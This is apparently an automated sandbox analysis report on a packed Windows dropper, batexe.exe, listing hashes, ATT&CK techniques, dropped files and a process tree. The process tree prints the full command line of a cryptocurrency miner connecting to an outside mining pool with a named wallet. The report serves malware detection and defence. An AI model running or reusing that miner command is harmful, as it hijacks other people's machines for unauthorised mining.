73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17/02/2024, 14:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5460	b2e.exe
2228	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2228	cpuminer-sse2.exe
2228	cpuminer-sse2.exe
2228	cpuminer-sse2.exe
2228	cpuminer-sse2.exe
2228	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5000-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5000 wrote to memory of 5460	5000	batexe.exe	84
PID 5000 wrote to memory of 5460	5000	batexe.exe	84
PID 5000 wrote to memory of 5460	5000	batexe.exe	84
PID 5460 wrote to memory of 224	5460	b2e.exe	86
PID 5460 wrote to memory of 224	5460	b2e.exe	86
PID 5460 wrote to memory of 224	5460	b2e.exe	86
PID 224 wrote to memory of 2228	224	cmd.exe	88
PID 224 wrote to memory of 2228	224	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5000
- C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\615A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:224
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\b2e.exe

Filesize
10.1MB

MD5
dcbb8631c7377e511035d0ad075ca3b8

SHA1
8829474dcc459e976cc0303604a81c01686827b5

SHA256
49c4bda519a6458aa1c84d3d71bfa4fb16694435332b4205d56dcd391c56c59c

SHA512
86899fb971bf07f9607a0c233f644dde7848795db95e8ce3447dbd41dc15380879956a319bd8fa3e98b9fb4f50f2406abf23f84ff717dc6cd8e23b53f4d7d8dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\b2e.exe

Filesize
2.8MB

MD5
898fa1ca35d3256365e9cc3a67e4f821

SHA1
baa146c17ec67e47979a277de8dd691ab85f6633

SHA256
1364a1ec688e73164520158510bd3ca8a01a03c12a36a81f4a807b8ddb96d5d6

SHA512
a2d779939cf1ecd193bbb36fbfa75f242bbf2ebcb9fc963fdb96187c5066c22a81ef52a9a9440d16c5a9e48a285dda84125cefa7a2af2e56e24d28822318390f

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E6C.tmp\b2e.exe

Filesize
3.6MB

MD5
fdaaf7d965c84bcb0cab11b2d2bdb173

SHA1
06ce9063a87ea7e63921c7a782785ff636505e6f

SHA256
ee3e411c8b8f2c1012ecfaaacc20bcb1735d3e905b12b3f48588f123303fbcba

SHA512
b1344f69c58f1587a8ec954472f406d28e96a739da2a0ed6c608e49a1c8ba90896384e5871448e51382fb36e88425dcff77e8c2f03fa97ce03746401962ce195

Download Submit
C:\Users\Admin\AppData\Local\Temp\615A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
199KB

MD5
d696cc96aca21db8f9c672e8f8dff07f

SHA1
9a874164e22df857ae742ad432df4f5eb88d6a6e

SHA256
aa6f41dfbbe3f88cfa5dbf8b267b81b028c9c9cd9470ce1b294183854aa7d0f0

SHA512
a6d6483e5d73be74bf4cbcae3a3f702be6969922344d5dd88aa31a168ab8bc31a2521e8c9bca8a632da4825ce5586761949f2ec8641cc64d44703189618b09f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
144KB

MD5
e75b7fad524ea48c25574d57a17ce000

SHA1
c1043cf48b1bbfa64c7cbc5366566190e91c3d49

SHA256
5fc8d23af4bd538901e7edeaf35c339c60d73d50cc58594ec981babbabd2a26c

SHA512
194cf5e9b1ad4a49f82605189bc3fc74617855f43f7364b03b1bb2c3c25a4ad9a3e9dfd8d2d42e93a986dffbe81cce8d59d38e249bec36361305c265cf24023e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
263KB

MD5
e8c91ea319cda658160cc3b1182acbff

SHA1
5d006ed12ffb4b5b80556d77034b27b27f985cbe

SHA256
6fdb36faa3767640a31f095eb9e41be363a0e05bbb4b75e2c08a5c331c261ef0

SHA512
66894630947180f246aa60255a188623faa9d4800ac712991908cedbd29bbf72c6e7333999bb77a141a94d6a254cdaddf7dc6579631ac1de8fa7f4ff277b11f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
4.1MB

MD5
3b0e358d46daf4646f7bb4735a7cf0df

SHA1
96762e7afc42ce9896ea626028c3d2301a22066f

SHA256
220b8ad97ba0395d681e28109bdd3d79bef047cdf164c8208ae32d52f0fbdf84

SHA512
441977280fa74abdf0dbd2e211065f09dd80e555ae9a883d67edebf160ea5a2b9f905b0b40944d8b16b3ce9fa00541c0af617c93f2977e7e373ee3182677237e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
69KB

MD5
b397d22edabde61e99307d5be4ae1e4f

SHA1
fca021f822e017ba69a9062d7ca5fd818c5592ec

SHA256
337d2ff0361c6caeb22cd2a361693eec43345d235a45acbdb5f1e8899370976d

SHA512
14ef7650586501f38fa60765e1a4f786e694ebad25637ab4521255b1fda1ce4d78cfd99d22b31984b8af3ef078b12d2ffb7748ef1d3f0dba8d1ee85aceab0bb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
71KB

MD5
b309a4a27da8aa34540d57168f98292f

SHA1
860b7e102b985acb8fa857d39cd705a99b9a7a9d

SHA256
5e0cadf1cc5514e24226c4f9129c00880d7c483dd03c63923265d227905142cd

SHA512
70a785d623b1df43b52d089547d31c2858a0f4472f8ca3607a63f464bb41daba5c03f2ca3dcd0018d9fee59eff8fa909e49a2fe7f182a707e885ab6019094cd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
65KB

MD5
527da0018add831d963ba6ff2db15f59

SHA1
718d7bd5c50ea0ee1ed5ca11907da82353ee28b6

SHA256
28990656680f71f93727894751f5ce40c0f3390383ad3fe57192823c252eabff

SHA512
4ac51a9629d22c332cd8ca0b4deee363a21b5bf2395a87d341d20c83deabc196198278d87229afb96c85b3c676402ebb451a5cd484f3c0615b8b9d89b97b5aa3

Download Submit
memory/2228-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-46-0x0000000054CD0000-0x0000000054D68000-memory.dmp

Filesize
608KB

Download
memory/2228-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2228-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2228-47-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/2228-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2228-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5000-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5460-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5460-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download